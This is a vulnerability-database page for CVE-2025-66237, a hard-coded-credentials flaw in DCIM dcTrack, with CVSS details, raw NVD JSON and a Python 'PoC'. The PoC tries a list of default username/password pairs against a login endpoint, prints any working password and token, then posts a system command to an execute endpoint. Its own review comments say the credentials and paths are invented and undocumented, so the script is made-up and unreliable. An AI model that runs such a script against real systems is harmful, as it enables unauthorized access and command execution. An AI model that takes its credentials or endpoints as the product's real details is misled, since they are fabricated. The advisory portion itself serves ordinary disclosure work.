Security Vulnerability Report
CVE-2025-66237 CVSS 6.7 MEDIUM

CVE-2025-66237

Published: 2025-12-04 21:16:09
Last Modified: 2026-04-15 00:35:42

Description

DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host.

CVSS Details

CVSS Score
6.7 (CVSS v3.1 base score; the raw record below also carries a CVSS v4.0 base score of 8.4, HIGH)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DCIM dcTrack - for the affected versions, refer to the official advisory ICSA-25-338-05.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66237 PoC - DCIM dcTrack Default Credentials Exploitation
# Note: This is a simulated PoC for educational purposes only
#
# NOTE(review): line breaks and indentation are reconstructed from a listing
# that was collapsed onto two lines; the nesting of the inner statements is the
# most plausible reading, not a confirmed one.
# NOTE(review): the record on this page scores the issue as AV:L / PR:H (local
# access, high privileges). This script instead models an HTTP login, so it
# does not obviously correspond to the scored scenario.
import requests
import json  # NOTE(review): imported but never used in this listing

TARGET_HOST = "http://target-dcim-server"  # placeholder host name
DCIM_PORT = 8080  # NOTE(review): the record on this page does not state a port

# Hardcoded/default credentials for dcTrack (example paths)
# NOTE(review): the author labels these as examples. Neither the description
# nor the raw record on this page lists any username or password, so these
# pairs should not be read as the product's real defaults or used as
# indicators; take confirmed detail from advisory ICSA-25-338-05.
DEFAULT_CREDENTIALS = [
    {"username": "admin", "password": "admin123"},
    {"username": "admin", "password": "dctrack_default"},
    {"username": "system", "password": "system123"},
    {"username": "dctrack", "password": "dctrack"},
    {"username": "svc_dcim", "password": "DCIM_svc_2024"}
]


def exploit_dctrack_credentials():
    """
    Exploitation steps for CVE-2025-66237:
    1. Identify running dcTrack service
    2. Attempt login with default credentials
    3. Extract session token
    4. Access database management interface
    5. Execute system commands via admin panel

    Posts each entry of DEFAULT_CREDENTIALS to the login URL and, on a
    response that reports success, issues two follow-up requests with the
    returned token.

    Returns:
        True when the final request answers with HTTP 200, otherwise False.

    Note: the inline step comments in the body are numbered 1-4 and do not
    line up with the five steps listed above. The URL paths used here are not
    documented anywhere on this page.
    """
    session = requests.Session()

    # Step 1: Service discovery
    # NOTE(review): no discovery request is made; this only builds the base URL.
    base_url = f"{TARGET_HOST}:{DCIM_PORT}"

    # Step 2: Attempt authentication with default credentials
    for cred in DEFAULT_CREDENTIALS:
        login_payload = {
            "username": cred["username"],
            "password": cred["password"],
            "rememberMe": False
        }
        try:
            response = session.post(
                f"{base_url}/api/auth/login",
                json=login_payload,
                timeout=10
            )
            if response.status_code == 200:
                data = response.json()
                if data.get("success"):
                    token = data.get("token")
                    # NOTE(review): the matched password and the bearer token are
                    # written to stdout in clear text, so any captured console
                    # output or job log ends up holding them.
                    print(f"[+] SUCCESS: Valid credentials found!")
                    print(f"[+] Username: {cred['username']}")
                    print(f"[+] Password: {cred['password']}")
                    print(f"[+] Token: {token}")

                    # Step 3: Access database management
                    # NOTE(review): db_response is assigned but never read, and
                    # this call has no timeout, unlike the login request.
                    db_response = session.get(
                        f"{base_url}/api/database/query",
                        headers={"Authorization": f"Bearer {token}"}
                    )

                    # Step 4: Execute system commands
                    cmd_payload = {
                        "command": "whoami",
                        "target": "host_system"
                    }
                    exec_response = session.post(
                        f"{base_url}/api/system/execute",
                        json=cmd_payload,
                        headers={"Authorization": f"Bearer {token}"}
                    )
                    # The message below is printed on the status code alone; the
                    # response body is never inspected, so it is not evidence
                    # that a command actually ran.
                    if exec_response.status_code == 200:
                        print(f"[+] SYSTEM COMPROMISED: Command execution successful")
                        return True
        # Request errors are discarded (e is unused) and the loop moves on, so
        # an unreachable host ends with the same "Failed" message as a rejected
        # login. A negative result here says nothing about whether a system is
        # affected.
        except requests.exceptions.RequestException as e:
            continue

    # Also reached when a login succeeded but the last request was not HTTP 200.
    print("[-] Failed: No valid default credentials found")
    return False


if __name__ == "__main__":
    # Print a banner, then run the check once; the return value is ignored.
    print("=" * 60)
    print("CVE-2025-66237 PoC - DCIM dcTrack Default Credentials")
    print("=" * 60)
    exploit_dctrack_credentials()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66237", "sourceIdentifier": "[email protected]", "published": "2025-12-04T21:16:09.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DCIM dcTrack platforms utilize default and hard-coded credentials for access. An attacker could use these credentials to administer the database, escalate privileges on the platform or execute system commands on the host."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05", "source": "[email protected]"}]}}